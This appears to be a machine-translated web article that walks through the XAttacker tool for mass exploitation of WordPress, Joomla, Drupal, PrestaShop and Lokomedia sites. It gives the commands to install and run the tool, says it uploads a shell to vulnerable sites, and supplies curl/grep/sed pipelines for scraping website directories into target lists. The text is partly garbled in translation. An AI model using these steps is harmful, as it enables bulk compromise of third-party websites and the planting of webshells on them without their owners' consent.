From an attacker’s point of view, the site engines are no different from other services and services. Their source code is usually in the public domain, and any researcher can analyze it for errors, including security holes. Therefore, sites on a CMS rarely fall victim to a targeted attack. More often than not, they are broken in bulk.
Hacking sites is one of the most common types of attacks. If you are interested in how sites are hacked and what you need to look at to protect your resource, this article is for you. By structure, sites are divided into three large classes:
- Selfwritten (made manually in HTML, produced by a static generator of type Jekyll or built in a constructor program of type Adobe Dreamweaver);
- made in online constructors (mainly business cards without any databases and transmitted fields);
.
working on ready-made CMS (Content Management System).
There are still homemade CMS, created for a particular site, but it has now become a rarity – to afford the support of its system can only the largest resources, and to justify the associated costs are not easy.
Hacking
.
Small manual on using the program XAttacker. Since the program is designed to check a large number of sites, I will also show examples of compiling lists of sites. XAttacker can search for sites by dorck (via Bing) or work with your list of sites, then automatically detects the CMS of each site and checks for popular vulnerabilities. Supported content management systems: WordPress, Joomla, DruPal, PrestaShop and Lokomedia. If a vulnerability is found, the shell is uploaded to the site.
Since the checks are fully automated and the list of known vulnerabilities is limited, the most obvious use of the program is:
.
- check target site when time is short
- check a large number of sites for vulnerabilities
Mass check and exploitation of vulnerabilities on WordPress, Joomla, DruPal, PrestaShop and Lokomedia sites
To install the program:
git clone //github.com/Moham3dRiahi/XAttacker cd XAttacker/
Can be run without options:
perl XAttacker.pl
Then the program will print out:
[+] You Have List Of Sites
[1] Yes
[2] No
[-] Choose :
perl XAttacker.pl -l list.txt
In this list, sites must be listed with the protocol (http or https).
The program will check them all in turn, show the found vulnerabilities and load the shell if it is successfully exploited.
Also all vulnerable sites will be listed with the found vulnerability in file Result/vulntargets.txt.
How to make lists of websites
.
The easiest way to get lists is to parse pages that list many sites. These can be directories, search results, different aggregators and so on.
For example, parsing sites from a popular directory:
curl -s //top.mail.ru/Rating/Computers-Programming/Today/Visitors/{1...60}.html | grep -E '><a class="t90. *</a>' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//' > prog.txt.
Note that the construction {1…60}, which in Bash means the output of a sequence of characters, in this case from 1 to 60, which means that the sites will be collected from the first sixty pages of the directory.
Another example:
echo"//`curl -s //top.mail.ru/Rating/Job/Today/Visitors/{1...60}.html | grep -E '><a class="t90.*</a>' | grep -E -v '[. ]html' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//'`' > biz.txt.
Even larger lists of sites can be obtained, for example, for the shared hosting IP using this service. However, there are sites displayed without protocol, so the following command must be executed for the resulting list:
sed -i -e 's/^/\/\//' list.txt.
As a result, the initial line “//” will be added for each site in the list.
Exclusion
.
XAttacker is very easy to use, but new vulnerabilities have not been added for quite some time, so in order for it to produce a positive result you need to check a really large number of sites.
Either, to significantly improve the results, you need to search through dortices specially selected for the vulnerabilities that this program supports – but it requires additional intellectual effort.
Source: //kali.org.ru/